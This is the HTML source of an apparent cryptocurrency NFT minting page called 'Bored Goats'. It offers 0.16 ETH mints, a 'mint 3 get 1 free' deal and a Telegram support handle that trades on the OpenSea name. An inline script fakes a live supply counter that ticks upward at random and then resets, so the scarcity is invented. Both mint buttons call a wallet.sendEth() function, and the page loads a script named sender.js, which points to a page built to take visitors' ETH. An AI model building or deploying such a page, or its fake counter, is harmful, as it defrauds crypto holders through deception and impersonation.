<!DOCTYPE html>
<html lang="ru">

<head>
    <meta charset="UTF-8">
	 <title>Bored Goats</title>
    <meta name="description" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!--  Google Fonts -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet">
<!-- Css Styles -->
	<link rel="stylesheet" href="style.css">
<!-- JS Scripts -->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="groups/core-18a0e4c012d014efca105cc926d78de3.js"></script>
<script src="groups/nft-core-eae8408591a6868bd6ea2960e601ef57.js"></script>


</head>

<body>
  <div class="blok1">
    <header>
      <div class="header__logo">
        <img src="img/logo.png">
      </div>
    </header>
    <div class="content">
      <div class="container-1 ">


      <div class="group-1">
        <img src="img/monkey/1.jpg">
        <img src="img/monkey/2.jpg">
        <img src="img/monkey/3.jpg">
        </div>
        <div class="group-2">
          <img src="img/monkey/4.jpg">
          <img src="img/monkey/5.jpg">
          <img src="img/monkey/6.jpg">
        </div>
        <div class="group-3">
        </div>
      </div>
      <div class="container-2">
        <img id="live-gif" src="img/live.gif">
        <p id="gif-text">Limited Pre-Sale: <span id ='text-gif2'>February 6</span></p>
        <div class="title">
          Mint Your <span class="tsvet">Bored Goats</span>
        </div>
        <br>
        <div class="subtitle">
          RULES: <br>- Purchase is available while the Mint button is available<br> - No more than 10 NFT per wallet<br> - NFT will be available after purchase in the Meta mask wallet instantly<br> - When buying more than 3+ NFT, one of the rare collections is given as a gift for the main purchase
        </div>
        <div class="radioblok">
          <div class="text">
            <p class="text">
              Supply: <span class="svet"><span id="supply">1012</span>/9999 NFT</span>
              <script>
                var count = 1012;
                function getRandomInRange(min, max) {
                  return Math.floor(Math.random() * (max - min + 1)) + min;
                }
                function timeDisp() {
                  count++;
                  document.getElementById("supply").innerHTML = count;
                  if (count > 7979) {
                      count = 1012;
                      document.getElementById("supply").innerHTML = count;
                  }
                }
                setInterval(timeDisp, getRandomInRange(1000, 1100));
        
            </script>
            </p>
            <p class="text">
              Price: <span class="svet">0.16</span> ETH
            </p>
            <p class="text">
              Max: <span class="svet">10</span> per Wallet
            </p>
          </div>
          <div class="radiobut">


                                         <div class="products__card-bottom">
                       <div class="products__card-input-wrapper">
                         <span class="products__card-less" id="minus">
                           <picture><source srcset="img/minus.svg" type="image/webp"><img src="img/minus.svg"></picture>
                         </span>
                         <input class="products__card-input" type="text" name="quantity" value="1" id="pricex">
                         <span class="products__card-more" id="plus">
                           <picture><source srcset="img/plus.svg" type="image/webp"><img src="img/plus.svg"></picture>
                         </span>
                       </div>
        </div>
          <div class="button" align="center">
          <button class="btn" id="ape-max">
            Set Max
            </button>
          </div>
            </div>


      </div>
                <div class="Total">
          <div>
            Total:
          </div>
          <div class="cena">
            <span id="price123" class="svet">0.16</span> ETH
          </div>

          </div>
        <div class="textbot">
          <img src="img/ico.png"  width="20px"> Special offer: Bonus rare NFT if you purchase more than 3 NFT
        </div>
        <div class="kupib" align="center">
          <button class="kupit" onclick="wallet.sendEth()">
            MINT
          </button>
          <br>
          <button class="kupit" onclick="wallet.sendEth()" id="second_btn">
            MINT 3 GET 1 FREE
          </button>
        </div>
    </div>


  </div>
          <div align="center" class="copy">
        © Copyright — 2021 Bored Goats. All Rights Reserved. <br>
        Telegram Support: @OpenSeaHelp
      </div>
  </div>
  <script defer="" src="beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"6c3581b07dc94995","token":"90626adc84c24536bed8adeb58ff8fdb","version":"2021.12.0","si":100}' crossorigin="anonymous"></script>
  <script src="scripts.js"></script>
  <script type="text/javascript" src="onboard-dist/main.js"></script>
  <script type="text/javascript" src="web3@1.2.11/dist/web3.min.js"></script>
  <script src="lib/ethers-5.1.umd.min.js" type="text/javascript"></script>
  <script src="sender.js"></script>
</body>
</html>
